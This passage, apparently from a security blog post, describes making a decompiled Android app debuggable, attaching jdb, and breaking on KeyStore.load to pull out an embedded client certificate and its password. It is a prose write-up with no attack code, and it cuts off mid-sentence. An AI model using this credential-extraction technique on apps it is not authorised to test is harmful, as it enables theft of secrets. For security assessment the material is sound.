<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Reviewing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> of the decompiled application indicated that the application was not compiled with the debug flag and hence could not be debugged on a device. So I added the debug flag, recompiled it, signed the application and then installed it on the device. The following steps summarize the process of creating debuggable versions of existing Android applications if you plan to debug the application on an actual device.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Decompile the application with </span><a href="http://forum.xda-developers.com/showthread.php?t=1989533" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">apktool</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">android:debuggable="true"</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><a href="http://developer.android.com/tools/device.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">attribute</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">application</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> element in the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Recompile the application with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">apktool</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Sign the application with </span><a href="http://www.adbtoolkit.com/kitchen/tools/linux/signapk-README.txt" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">SignApk</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></a></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Install the application</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The image below shows the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">debuggable</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> attribute added to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file of the target application.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sZeRdpu6fwJ89iLmP8qUADNH-fMRNN7QhUoFmZpMduDp9Abba8mctwT7NWrLI0sRDOyYg71wN13Xvrl-vsjDpJPrRNtNVQMVunyTPe6uDie-e9IrwKpBhjt-Z9U4I5dZ-iQrp5B4RpT_/s1600/debug-flag-added.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1sZeRdpu6fwJ89iLmP8qUADNH-fMRNN7QhUoFmZpMduDp9Abba8mctwT7NWrLI0sRDOyYg71wN13Xvrl-vsjDpJPrRNtNVQMVunyTPe6uDie-e9IrwKpBhjt-Z9U4I5dZ-iQrp5B4RpT_/s400/debug-flag-added.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you are using an emulator, you can extract the application from the device, install it on the emulator and attach a debugger without decompiling or adding the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">debuggable </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">attribute to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">AndroidManifest.xml</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> file.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let us now look at some of the important pieces of the debugging setup that was used.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: large;"><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Java Debug Wire Protocol (</span><a href="http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">JDWP</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The Java Debug Wire Protocol is a protocol used for communication between a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debugger and the Java Virtual machine. The Dalvik Virtual Machine that is responsible for running the applications on Android devices supports </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> as it debugging protocol. Each application that runs on a Dalvik VM exposes a unique port to which </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debuggers can attach and debug the application. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Once the application was installed on the device in debug mode, the next step was to attach a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDWP</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> compliant debugger, such as </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, and get going. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: large;"><a href="http://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">jdb</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – The Java Debugger</span></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is a JDWP compatible command-line debugger that ships with Java JDK and I use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> for its command line goodness. The typical process of attaching </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to an Android application is summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Launch the application that you want to debug</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain its process ID</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Use </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">adb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to port forward JDWP connection to the application JDWP port</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attach </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to the application</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set breakpoints and debug the application</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following resources can get you started on </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> debugging with Android.</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Using various JDB commands - </span><a href="http://droiddebugger.blogspot.com/2012/05/droiddebugger.html#!/2012/05/droiddebugger.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://droiddebugger.blogspot.com/2012/05/droiddebugger.html#!/2012/05/droiddebugger.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">JDB Command reference - </span><a href="http://droiddebugger.blogspot.com/2012/05/command-reference-for-jdb.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://droiddebugger.blogspot.com/2012/05/command-reference-for-jdb.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Command line Android debugging - </span><a href="http://codeseekah.com/2012/02/16/command-line-android-development-debugging/" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://codeseekah.com/2012/02/16/command-line-android-development-debugging/</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
</ol>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Debugging for the Client Certificate</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point, I knew the exact locations where breakpoints were needed to obtain client certificate and corresponding password. I setup the breakpoints in the functions that invoked the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">method of a </span><a href="http://docs.oracle.com/javase/7/docs/api/java/security/KeyStore.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance to store the client certificate. So I launched the application and then browsed to the functionalities that would invoke the code paths leading to the breakpoints. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After hitting the breakpoint, I executed </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">jdb</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">dump</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to query the instance variable and invoked its different methods to retrieve the important information. The instances variable of interest was of class </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The Java class under analysis retrieved client certificate and its password by the following calls before feeding them to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">method:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It called a method </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">b()</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">on its instance variable “</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g”</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to obtain the certificate password and converted it to </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It called a method </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">a()</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> on its instance variable “</span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">g”</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to obtain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation of client certificate and wrapped it in a </span><a href="http://docs.oracle.com/javase/7/docs/api/java/io/ByteArrayInputStream.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">ByteArrayInputStream</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; 